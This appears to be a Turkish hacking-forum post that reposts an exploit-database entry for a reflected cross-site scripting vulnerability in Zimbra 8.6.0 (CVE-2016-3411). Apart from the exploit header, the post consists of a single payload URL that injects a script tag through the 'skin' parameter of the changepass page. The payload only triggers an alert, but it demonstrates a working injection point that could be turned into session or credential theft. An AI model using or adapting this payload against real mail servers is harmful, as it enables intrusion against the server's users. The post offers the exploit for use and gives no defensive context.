Hoşgeldin Misafir

Zimbra 8.6.0_GA_1153 - Cross-Site Scripting Vulnerability

NasyoneL

NasyoneL

Karanlık Özgürlüktür
25 Ağu 2017
25,060 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Zimbra 8.6.0_GA_1153 - Cross-Site Scripting Vulnerability

PHP:
# Exploit Title: Xss Zimbra Mail server
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/
  
# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411
  
  
Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>
 
#  0day.today [2018-08-14]  #